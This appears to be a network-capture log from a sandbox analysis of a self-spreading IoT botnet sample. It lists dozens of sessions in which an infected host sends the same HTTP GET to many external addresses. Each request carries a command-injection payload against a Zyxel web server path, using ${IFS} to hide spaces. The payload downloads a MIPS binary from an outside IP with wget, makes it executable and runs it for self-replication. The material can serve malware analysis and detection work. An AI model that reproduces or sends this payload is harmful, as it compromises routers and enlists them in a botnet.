                                                Jan 28, 2024 10:16:23.780458927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3908192.168.2.2352524153.34.57.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780493975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3909192.168.2.235989625.165.211.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780539989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3910192.168.2.2354660131.37.139.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780561924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3911192.168.2.233474472.218.63.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780599117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3912192.168.2.2359424119.98.195.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780635118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3913192.168.2.2338370158.180.203.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780653954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3914192.168.2.2345220138.200.120.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780690908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3915192.168.2.2345324142.227.180.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780738115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3916192.168.2.2341610156.67.34.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780739069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3917192.168.2.2355398124.21.165.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780759096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3918192.168.2.2333500191.134.160.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780798912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3919192.168.2.235435465.238.143.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780846119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3920192.168.2.233752694.123.8.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780858994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3921192.168.2.233630679.93.176.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780879021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3922192.168.2.2337650181.113.224.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780915976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3923192.168.2.234989886.47.152.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780940056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3924192.168.2.234348046.25.41.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780955076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3925192.168.2.234495225.72.211.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780973911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3926192.168.2.235033252.13.101.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781016111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3927192.168.2.2339760171.162.139.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781017065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3928192.168.2.2338336158.123.82.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781028986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3929192.168.2.2340122184.133.241.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781054974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3930192.168.2.235959845.124.56.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781080961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3931192.168.2.2358062210.208.111.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781094074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3932192.168.2.235516278.85.112.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781131983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3933192.168.2.233632262.107.226.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781164885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3934192.168.2.2339504102.225.137.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781193018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3935192.168.2.234824868.209.168.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781220913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3936192.168.2.2354982198.188.54.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781274080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3937192.168.2.235175278.112.157.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781303883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3938192.168.2.235560660.112.26.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781326056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3939192.168.2.235562019.112.232.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781366110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3940192.168.2.234269270.219.26.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781377077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3941192.168.2.2336922211.170.201.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781403065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3942192.168.2.2348398201.80.79.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781413078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3943192.168.2.2338702196.18.181.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781451941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3944192.168.2.234020438.237.3.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781457901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3945192.168.2.235831076.63.253.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781507015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3946192.168.2.234385020.183.106.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781533003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3947192.168.2.233570283.159.133.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781554937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3948192.168.2.2333502113.150.163.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781590939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3949192.168.2.2341052121.220.60.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781646013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3950192.168.2.2354718121.119.175.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781667948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3951192.168.2.236004650.136.209.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781677008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3952192.168.2.2353954205.143.237.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781702042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3953192.168.2.233970636.107.184.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781754017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3954192.168.2.234573495.139.42.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781776905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3955192.168.2.2350720126.133.10.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781786919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3956192.168.2.234618668.164.133.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781800985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3957192.168.2.2359608161.54.165.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781851053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3958192.168.2.2357268181.229.107.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781873941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3959192.168.2.2353074107.220.93.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781925917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3960192.168.2.2358962187.190.98.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781933069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3961192.168.2.2348244110.53.41.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781950951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3962192.168.2.234154648.156.234.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781970978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3963192.168.2.2348302157.119.106.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.781994104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3964192.168.2.235918834.116.47.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782027006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3965192.168.2.2357340195.73.161.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782069921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3966192.168.2.2350440209.239.92.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782128096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3967192.168.2.2339578165.46.96.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782136917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3968192.168.2.2348962218.58.205.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782164097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3969192.168.2.2358676122.232.217.91443
                                                TimestampBytes transferredDirectionData
